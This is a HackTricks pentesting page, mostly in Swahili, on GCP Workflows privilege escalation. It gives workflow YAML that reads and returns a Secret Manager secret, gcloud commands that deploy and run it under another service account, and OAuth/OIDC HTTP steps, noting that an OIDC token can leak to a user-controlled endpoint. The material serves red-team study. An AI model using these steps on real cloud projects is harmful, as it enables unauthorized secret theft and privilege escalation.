GCP - Workflows Privesc

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Workflows

Basic Information:

GCP - Workflows Enum

workflows.workflows.create, iam.serviceAccounts.ActAs, workflows.executions.create, (workflows.workflows.get, workflows.operations.get)

Kwa kadri ninavyojua, si rahisi kupata shell yenye ufikiaji wa metadata endpoint inayoshikilia akreditif za SA ya SA iliyoshambuliwa kwenye Workflow. Hata hivyo, inawezekana kutumia vibaya ruhusa za SA kwa kuongeza vitendo vya kutekeleza ndani ya Workflow.

Inawezekana kupata nyaraka za viunganishi. Kwa mfano, hii ni ukurasa wa kiunganishi cha Secretmanager. Katika upande wa bar, inawezekana kupata viunganishi vingine vingi.

Na hapa unaweza kupata mfano wa kiunganishi ambacho kinachapisha siri:

yaml
main:
params: [input]
steps:
- access_string_secret:
call: googleapis.secretmanager.v1.projects.secrets.versions.accessString
args:
secret_id: secret_name
version: 1
project_id: project-id
result: str_secret
- returnOutput:
return: "${str_secret}"

Sasisha kutoka kwa CLI:

bash
gcloud workflows deploy <workflow-name> \
--service-account=email@SA \
--source=/path/to/config.yaml \
--location us-central1

Ikiwa unapata kosa kama ERROR: (gcloud.workflows.deploy) FAILED_PRECONDITION: Workflows service agent does not exist, ngoja dakika moja na ujaribu tena.

Ikiwa huna ufikiaji wa mtandao, inawezekana kuanzisha na kuona utekelezaji wa Workflow kwa:

bash
# Run execution with output
gcloud workflows run <workflow-name> --location us-central1

# Run execution without output
gcloud workflows execute <workflow-name> --location us-central1

# List executions
gcloud workflows executions list <workflow-name>

# Get execution info and output
gcloud workflows executions describe projects/<proj-number>/locations/<location>/workflows/<workflow-name>/executions/<execution-id>

caution

Unaweza pia kuangalia matokeo ya utekelezaji wa awali kutafuta taarifa nyeti

Kumbuka kwamba hata kama unapata kosa kama PERMISSION_DENIED: Permission 'workflows.operations.get' denied on... kwa sababu huna ruhusa hiyo, workflow imeundwa.

Leak OIDC token (na OAuth?)

Kulingana na nyaraka inawezekana kutumia hatua za workflow ambazo zitatumia ombi la HTTP na token ya OAuth au OIDC. Hata hivyo, kama ilivyo katika kesi ya Cloud Scheduler, ombi la HTTP lenye token ya Oauth lazima liwe kwa mwenyeji .googleapis.com.

caution

Hivyo, ni uwezekano wa kuvuja token ya OIDC kwa kuashiria mwisho wa HTTP unaodhibitiwa na mtumiaji lakini ili kuvuja token ya OAuth unahitaji kupita kwa ulinzi huo. Hata hivyo, bado unaweza kuwasiliana na api yoyote ya GCP ili kufanya vitendo kwa niaba ya SA ukitumia ama viunganishi au maombi ya HTTP yenye token ya OAuth.

Oauth

yaml
- step_A:
call: http.post
args:
url: https://compute.googleapis.com/compute/v1/projects/myproject1234/zones/us-central1-b/instances/myvm001/stop
auth:
type: OAuth2
scopes: OAUTH_SCOPE

OIDC

yaml
- step_A:
call: http.get
args:
url: https://us-central1-project.cloudfunctions.net/functionA
query:
firstNumber: 4
secondNumber: 6
operation: sum
auth:
type: OIDC
audience: OIDC_AUDIENCE

workflows.workflows.update ...

Kwa ruhusa hii badala ya workflows.workflows.create inawezekana kuboresha mchakato uliopo tayari na kufanya mashambulizi sawa.

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks